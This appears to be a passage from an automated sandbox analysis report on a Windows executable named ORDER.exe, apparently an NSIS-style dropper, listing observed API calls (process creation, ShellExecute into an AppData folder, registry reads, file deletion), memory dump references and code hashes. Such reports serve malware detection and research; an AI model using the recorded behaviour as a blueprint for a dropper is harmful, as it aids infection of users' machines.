                          • Error launching installer, xrefs: 004054F8
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID: Error launching installer
                          • API String ID: 3712363035-66219284
                          • Opcode ID: a807c8c1498f9a3ccd34e9273e49e04dcb617f56f5cccdb726230c0895ca6d7f
                          • Instruction ID: 0ae392a05d3974bec86de51aa2f8a5c28ff0ee3cdd976454f3eed0d5dd72dd2a
                          • Opcode Fuzzy Hash: a807c8c1498f9a3ccd34e9273e49e04dcb617f56f5cccdb726230c0895ca6d7f
                          • Instruction Fuzzy Hash: 2BE0BFB4A00209BFEB109FA4ED05F7B76ADEB14745F508561BD11F2160E774A9108A79
                          APIs
                            • Part of subcall function 00405FA1: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ORDER.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77233410,004033C9), ref: 00405FF9
                            • Part of subcall function 00405FA1: CharNextA.USER32(?,?,?,00000000), ref: 00406006
                            • Part of subcall function 00405FA1: CharNextA.USER32(?,"C:\Users\user\Desktop\ORDER.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77233410,004033C9), ref: 0040600B
                            • Part of subcall function 00405FA1: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77233410,004033C9), ref: 0040601B
                          • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77233410,004033C9), ref: 00403204
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: Char$Next$CreateDirectoryPrev
                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 4115351271-2414109610
                          • Opcode ID: ee23c129dd8a5d49f4f649e38bc420fd14e59507522fd77197c34cef7b8656a6
                          • Instruction ID: 89773af62672bbf6302d30782f314b1c1bc42d6855f09756152acd8bf908297a
                          • Opcode Fuzzy Hash: ee23c129dd8a5d49f4f649e38bc420fd14e59507522fd77197c34cef7b8656a6
                          • Instruction Fuzzy Hash: 24D0C71290AD3066D5513B6A7C46FCF050C8F4675DF11807BF904751C58F6C555395EF
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fa6151eb6114a7c7dde5596e7ed141339a6810161cd6e35f889c2edb9118ca88
                          • Instruction ID: d3f30c549e8eaa155af2d8805db43d359078549a114e1d1e4cfdde4495a9482f
                          • Opcode Fuzzy Hash: fa6151eb6114a7c7dde5596e7ed141339a6810161cd6e35f889c2edb9118ca88
                          • Instruction Fuzzy Hash: 13A14471E00228CBDF28DFA8C8447ADBBB1FB45305F15816ED816BB281D7785A96DF44
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e9dede487193b96133ea94438acbc75bab27e7ac1b94d370ef06066709f64446
                          • Instruction ID: 66af66db22d428e7cee4185570621c0262e28a8f97ef0091af547b150b1cef7f
                          • Opcode Fuzzy Hash: e9dede487193b96133ea94438acbc75bab27e7ac1b94d370ef06066709f64446
                          • Instruction Fuzzy Hash: 7F912170E00228CBDF28DF98C8947ADBBB1FB45305F15816ED816BB281C7786A96DF44
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d2d995426ddd841542114576c7cd3986778113386b5e0d0d2bb3b42046c5d03f
                          • Instruction ID: 36158da5dd70985ab85e2c4d41886ca33cae813362c0b87a96f868d92fb05337
                          • Opcode Fuzzy Hash: d2d995426ddd841542114576c7cd3986778113386b5e0d0d2bb3b42046c5d03f
                          • Instruction Fuzzy Hash: 65815771D00228CFDF24CFA8C8847ADBBB1FB45305F25816AD816BB281D778A996DF15
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 68ae08bc292ff831ddf939399879833efa26d2e617e1386947dce183f6739e75
                          • Instruction ID: 1715bfb1c3d5716620224504c503b3d15fe2aa0a2bbcc08a305e6ffc6cb4203b
                          • Opcode Fuzzy Hash: 68ae08bc292ff831ddf939399879833efa26d2e617e1386947dce183f6739e75
                          • Instruction Fuzzy Hash: 53817771D00228DBDF24CFA8C8447ADBBB0FB44301F2581AED856BB281D7786A96DF45
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2929f55d3e8b81ac1e584e7399a4f2facda7d772583105b5c0ec75abe6cb9a93
                          • Instruction ID: 032b7c8430df6362c90b97cb5f8c3133674bcd2d0f853081a3cdcc23126a0f5c
                          • Opcode Fuzzy Hash: 2929f55d3e8b81ac1e584e7399a4f2facda7d772583105b5c0ec75abe6cb9a93
                          • Instruction Fuzzy Hash: 87711371D00228CFDF24CF98C8847ADBBB1FB48305F15806AD816BB281D7785996DF45
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 948a468c2091db2feb9fa4c22586628b65dd678cc983fa395508304452d62250
                          • Instruction ID: 3e9dbefe820a1d4baf734be7fb741bb2fb66d8e6f9ed59188b506b6c9edb630d
                          • Opcode Fuzzy Hash: 948a468c2091db2feb9fa4c22586628b65dd678cc983fa395508304452d62250
                          • Instruction Fuzzy Hash: AB711371E00228CBDF28CF98C884BADBBB1FB44305F15816ED816BB281D7786996DF45
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d63a3d575cf43ccaec2b316c623d79440d1cb8ee82c5371297a3fda91248972
                          • Instruction ID: 1812ff5f5430a706778d8acc512246fd3c212bc7acfdfbe5d0fa3af8c8d1a12f
                          • Opcode Fuzzy Hash: 2d63a3d575cf43ccaec2b316c623d79440d1cb8ee82c5371297a3fda91248972
                          • Instruction Fuzzy Hash: AD712471E00228CBDF28DF98C844BADBBB1FB44305F15806ED856BB291C7786A96DF45
                          APIs
                          • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
                          • WriteFile.KERNELBASE(00000000,004128A0,?,000000FF,00000000,004128A0,00004000,00409130,00409130,?,00000004,00000000,00000000,?,?), ref: 00402FD2
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: File$PointerWrite
                          • String ID:
                          • API String ID: 539440098-0
                          • Opcode ID: 41928112f34441f9b3539e2a42aa88ab340ce8e3764aaba8d566e6229e32b04b
                          • Instruction ID: 3b6e370e410e3f669d4a968ba26e16673121f6254c39c59cd6eb20204b18cf3c
                          • Opcode Fuzzy Hash: 41928112f34441f9b3539e2a42aa88ab340ce8e3764aaba8d566e6229e32b04b
                          • Instruction Fuzzy Hash: 14313931502259FFDF20DF55DD44A9E3BA8EF04395F20403AF908A61D0D2789A41EBA9
                          APIs
                          • GlobalFree.KERNEL32(006747C8), ref: 00401B80
                          • GlobalAlloc.KERNELBASE(?,00000404), ref: 00401B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: Global$AllocFree
                          • String ID: Call
                          • API String ID: 3394109436-1824292864
                          • Opcode ID: 18ce383e7496548239e61a876cd1621fb13a91c8cdd195502931e4b9b56164df
                          • Instruction ID: f4ea3dfc62e5d1cff0d3b4274299d05e9f4495bdac059fa06bbe17ad9de4a94b
                          • Opcode Fuzzy Hash: 18ce383e7496548239e61a876cd1621fb13a91c8cdd195502931e4b9b56164df
                          • Instruction Fuzzy Hash: 1721C072A00211ABC720EBA4CE8895E73B9EB54714724C53BF505B32D0D77CE8119F2E
                          APIs
                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                            • Part of subcall function 0040501F: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                            • Part of subcall function 0040501F: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll), ref: 0040508D
                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                            • Part of subcall function 004054E5: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421500,Error launching installer), ref: 0040550E
                            • Part of subcall function 004054E5: CloseHandle.KERNEL32(?), ref: 0040551B
                          • WaitForSingleObject.KERNEL32(?,?,00000000,000000EB,00000000), ref: 00401E6C
                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
                          • CloseHandle.KERNELBASE(?,00000000,000000EB,00000000), ref: 00401EA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                          • String ID:
                          • API String ID: 3521207402-0
                          • Opcode ID: 6d5b4df7f3f042f549e26a8ca851069bd4f569f0361fe87acde780f9e8383ee7
                          • Instruction ID: a57a420adebbec2e463a2757bf84d9d81012cc1a8c5c1569ff173e75ada2264d
                          • Opcode Fuzzy Hash: 6d5b4df7f3f042f549e26a8ca851069bd4f569f0361fe87acde780f9e8383ee7
                          • Instruction Fuzzy Hash: 66014031904114FBDF21AFA1DD859EE7B71EB40345F10857BFA01B51E1C3794A81EBAA
                          APIs
                          • RegOpenKeyExA.KERNELBASE(80000002,00405E62,00000000,00000002,?,00000002,?,?,00405E62,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405C46
                          • RegQueryValueExA.KERNELBASE(?,?,00000000,00405E62,?,00405E62), ref: 00405C67
                          • RegCloseKey.KERNELBASE(?), ref: 00405C88
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID:
                          • API String ID: 3677997916-0
                          • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                          • Instruction ID: f8269c4da42e469e915d7b724f411cb256963c2af92f405d5d85614ed9ec7fb6
                          • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                          • Instruction Fuzzy Hash: 8801487114420EEFEB128F64EC44EEB3FACEF15394F00402AF945A6220D235D964DBA5
                          APIs
                            • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,0000044B,00000000,00000022,00000000,?,?), ref: 00402B2F
                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402468
                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 0040247B
                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nst4C1A.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: Enum$CloseOpenValue
                          • String ID:
                          • API String ID: 167947723-0
                          • Opcode ID: 644ba4b7322b66dce4c699ceae064ea5186855f8b21283cab721fd429f29c5cc
                          • Instruction ID: 09a8887cd5e4729410dcfabe5c46d2a670465c21522258ca6cdcbf1033b2090e
                          • Opcode Fuzzy Hash: 644ba4b7322b66dce4c699ceae064ea5186855f8b21283cab721fd429f29c5cc
                          • Instruction Fuzzy Hash: E8F08671904204FFD7119F659D8CEBF7A6CEB40748F10453EF441B62C0D6B95E41966A
                          APIs
                            • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(?,?,004055BA,?,?,00000000,0040579D,?,?,?,?), ref: 004059A7
                            • Part of subcall function 004059A2: SetFileAttributesA.KERNELBASE(?,00000000), ref: 004059BB
                          • RemoveDirectoryA.KERNEL32(?,?,?,00000000,0040579D), ref: 004055C9
                          • DeleteFileA.KERNELBASE(?,?,?,00000000,0040579D), ref: 004055D1
                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 004055E9
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: File$Attributes$DeleteDirectoryRemove
                          • String ID:
                          • API String ID: 1655745494-0
                          • Opcode ID: abd038863be241f110d95ccd9fde628896f101e4ff1c11c0b7d20b5ecf2a2518
                          • Instruction ID: 12c6f0b15b18e033ed95b071f1fc2c07b3079c0683f10f414bd997d86f240b92
                          • Opcode Fuzzy Hash: abd038863be241f110d95ccd9fde628896f101e4ff1c11c0b7d20b5ecf2a2518
                          • Instruction Fuzzy Hash: 98E0E532518A5067C21057309D08A5F3ADADFCA324F044936F492F21D4DB7848068ABA
                          APIs
                          • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Rhabdophora\frysere\turnpike,?), ref: 00401E1E
                          Strings
